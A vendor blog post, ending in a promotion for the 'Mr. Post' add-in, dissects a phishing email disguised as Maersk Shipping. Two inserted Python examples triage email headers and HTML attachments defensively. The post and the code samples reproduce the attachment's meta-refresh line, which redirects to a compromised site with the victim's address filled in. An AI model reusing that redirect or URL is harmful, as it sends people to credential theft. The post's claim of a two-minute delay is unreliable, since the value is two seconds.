Attacks Disguised in Attachments

My day started with a strange email sitting in my Inbox this Monday. I call it strange because I am pretty sure I do not do any business with Maersk Shipping.

I wasn’t sure whether I should open the attachment, but I suspect some recipients would simply open the attached HTML file if they happened to use Maersk for their shipping arrangements.

So I decided to let Mr. Post tell me what the nature of the mail was. Sure enough, Mr. Post showed me something interesting.

The email routing map looks really suspicious. Zooming into the map, the email originated in Buffalo.

It then was mysteriously relayed through Houston over an insecure link.

Nowadays companies do not route their mail traffic through multiple relay hops, so I had a rough idea of what this could be. Instead of letting my web browser handle it directly, I chose to download “Maersk Original Shipping Docs.html” first and inspect it in a text editor to see what it was capable of.
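The routing observation above can be reproduced from the message headers themselves. The following is an added example, not code from the original post and not Mr. Post's code: it walks the Received: chain of a message, lists the hops in chronological order and flags any hop whose protocol keyword (per RFC 3848: ESMTPS, ESMTPSA and similar) does not indicate a TLS-protected link. The sample message is constructed; every hostname and address in it is a placeholder.

```python
"""Walk the Received: chain of an email and flag hops that did not use TLS.

Added example; not part of the original post and not Mr. Post's code.
The message below is constructed: hostnames and IPs are placeholders.
"""
import email
import re
from email import policy

# Constructed sample: three relay hops, the middle one without TLS.
SAMPLE_MESSAGE = """\
Received: from relay3.example.net (relay3.example.net [203.0.113.30])
 by mx.mydomain.example (Postfix) with ESMTPS id 0003
 for <myname@mydomain.example>; Mon, 3 Sep 2018 09:02:11 +0000
Received: from relay2.example.net (relay2.example.net [203.0.113.20])
 by relay3.example.net (Postfix) with ESMTP id 0002;
 Mon, 3 Sep 2018 09:02:05 +0000
Received: from [198.51.100.10] (unknown [198.51.100.10])
 by relay2.example.net (Postfix) with ESMTPSA id 0001;
 Mon, 3 Sep 2018 09:01:58 +0000
From: "Maersk Shipping" <docs@example.invalid>
To: myname@mydomain.example
Subject: Original Shipping Docs

see attached
"""

# "from <host> ... by <host> ... with <protocol>" as written by most MTAs
HOP_RE = re.compile(r"from\s+(\S+).*?\bby\s+(\S+).*?\bwith\s+(\S+)", re.I)


def parse_hops(raw_message: str) -> list:
    """Return the hops in chronological order (headers are newest-first)."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        value = re.sub(r"\s+", " ", str(header))  # unfold continuation lines
        m = HOP_RE.search(value)
        if not m:
            continue  # trailing-header formats we do not understand are skipped
        sender, receiver, proto = m.groups()
        proto = proto.upper()
        # RFC 3848 keywords: a trailing S (or SA, authenticated) means TLS
        hops.append({"from": sender, "by": receiver, "with": proto,
                     "tls": proto.endswith("S") or proto.endswith("SA")})
    return hops


def summarize(raw_message: str) -> dict:
    """Hop count plus the (from, by) pairs that were relayed without TLS."""
    hops = parse_hops(raw_message)
    return {"hop_count": len(hops),
            "insecure": [(h["from"], h["by"]) for h in hops if not h["tls"]]}


if __name__ == "__main__":
    for i, hop in enumerate(parse_hops(SAMPLE_MESSAGE), 1):
        print(f"hop {i}: {hop['from']} -> {hop['by']} via {hop['with']}"
              f" {'(TLS)' if hop['tls'] else '(NO TLS)'}")
    print(summarize(SAMPLE_MESSAGE))
```

The regex only understands the common "from ... by ... with ..." clause layout; a Received header written differently is skipped rather than guessed at, which is the safer failure mode for a triage tool.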

The first thing that caught my eye was this:

Mirrored from phinatics.com/finsradio.net/_vti_doc/_notes/_app_data/_x_ro/Adobe packing_List/1.htm by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 24 Mar 2016 16:12:32 GMT

So this web page was copied by HTTrack in 2016 from Miami Dolphins Phinatics. Alright, nothing to do with Maersk Shipping. Suspicion is rising.

Then Gmail appears.

<meta name="description" content="Gmail is email that&#39;s intuitive, efficient, and useful. 15 GB of storage, less spam, and mobile access.">

Again, Gmail has nothing to do with this mail or the attachment. Another clue.

Then the HTML document continues with a title tag and a favorite icon (favicon). Together these make the page look as if it came from Maersk.

<title>Maersk Shipping</title>
<link rel="SHORTCUT ICON" href="data:image/gif;base64,

Finally comes the most important part.

<meta http-equiv="refresh" content="2;URL=http://casayarte.es/images/mo/oauth/?email=MYNAME@MYDOMAIN"/>

Once this HTML page is opened, in 2 minutes it instructs the web browser to load a page from a website called casayarte.es, passing my email address in the URL. This website is about house and art, according to Google.

Absolutely nothing to do with shipping. This website is just another victim of hackers. The rest of the HTML doesn’t matter anymore.
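The manual read-through above (HTTrack mirror comment, mismatched meta description, Maersk title and favicon, meta refresh with the recipient's address in the URL) can be done without opening the file in a browser. The following is an added example, not code from the original post and not Mr. Post's code: it parses an HTML attachment with the standard library, pulls out those artefacts and turns them into findings. The sample document is constructed from the tags quoted in the post, with a placeholder in place of the favicon payload; the title/description comparison is a heuristic of this example. Per the HTML standard, the number before the semicolon in a refresh content attribute is a delay in seconds, so the example reports it in that unit.

```python
"""Static triage of an HTML e-mail attachment, without rendering it.

Added example; not code from the original post or from Mr. Post.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample reproducing the tags quoted in the post; the favicon
# payload is a placeholder, not the real base64 blob.
SAMPLE_ATTACHMENT = """\
<!DOCTYPE html>
<!-- Mirrored from phinatics.com/finsradio.net/_vti_doc/_notes/_app_data/_x_ro/Adobe packing_List/1.htm by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 24 Mar 2016 16:12:32 GMT -->
<html><head>
<meta name="description" content="Gmail is email that&#39;s intuitive, efficient, and useful. 15 GB of storage, less spam, and mobile access.">
<title>Maersk Shipping</title>
<link rel="SHORTCUT ICON" href="data:image/gif;base64,PLACEHOLDER">
<meta http-equiv="refresh" content="2;URL=http://casayarte.es/images/mo/oauth/?email=MYNAME@MYDOMAIN"/>
</head><body></body></html>
"""

# "<seconds>;URL=<target>" with optional quotes around the target
REFRESH_RE = re.compile(r"^\s*(\d+)\s*[;,]\s*url\s*=\s*['\"]?(.+?)['\"]?\s*$", re.I)


class AttachmentInspector(HTMLParser):
    """Collects comments, meta tags, title text and icon links."""

    def __init__(self):
        super().__init__()
        self.comments, self.metas, self.icons = [], [], []
        self.title = ""
        self._in_title = False

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta":
            self.metas.append(a)
        elif tag == "link" and "icon" in a.get("rel", "").lower():
            self.icons.append(a.get("href", ""))
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def parse_meta_refresh(content):
    """Return (delay_seconds, url) from a refresh content value, or None."""
    m = REFRESH_RE.match(content)
    return (int(m.group(1)), m.group(2)) if m else None


def inspect_html(source):
    """Return title, redirect details (if any) and a list of finding codes."""
    parser = AttachmentInspector()
    parser.feed(source)
    parser.close()
    findings, redirect = [], None
    title = parser.title.strip()

    if any("httrack" in c.lower() for c in parser.comments):
        findings.append("mirrored_page")      # cloned from some other site
    if any(href.startswith("data:") for href in parser.icons):
        findings.append("inline_favicon")     # branding embedded in the file
    for meta in parser.metas:
        if meta.get("name", "").lower() == "description":
            desc_words = set(re.findall(r"[a-z]+", meta.get("content", "").lower()))
            title_words = set(re.findall(r"[a-z]+", title.lower()))
            if title_words and not (desc_words & title_words):
                findings.append("title_description_mismatch")  # heuristic
        if meta.get("http-equiv", "").lower() == "refresh":
            parsed = parse_meta_refresh(meta.get("content", ""))
            if parsed:
                delay, url = parsed
                parts = urlsplit(url)
                query = parse_qs(parts.query)
                redirect = {
                    "delay_seconds": delay, "url": url, "host": parts.hostname,
                    "email_in_query": any(k.lower() == "email" or "@" in v
                                          for k, vs in query.items() for v in vs),
                }
                findings.append("auto_redirect")
                if redirect["email_in_query"]:
                    findings.append("email_in_redirect_url")  # pre-filled victim
    return {"title": title, "redirect": redirect, "findings": findings}


if __name__ == "__main__":
    print(inspect_html(SAMPLE_ATTACHMENT))
```

Because the file is only parsed, never rendered, nothing in it is fetched from the network; the redirect host and the pre-filled address come out as data you can act on (block, report, or hand to the user) rather than as a page that has already been visited.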

Now it’s clear what the attachment is capable of. I opened it with Chrome. The screen looked like this.

Really, I could not tell much of a difference without the previous analysis.

The lesson learned today: DO NOT OPEN any attachment in a suspicious mail.

Mr. Post analyzes the content of emails and visualizes their routing information on a map. With Mr. Post, you stay safe and assured.

Don’t be the next fraud victim. Install Mr. Post on Microsoft AppSource at zero cost!



2019-03-27T03:03:38+00:00 | September 5th, 2018 | Insight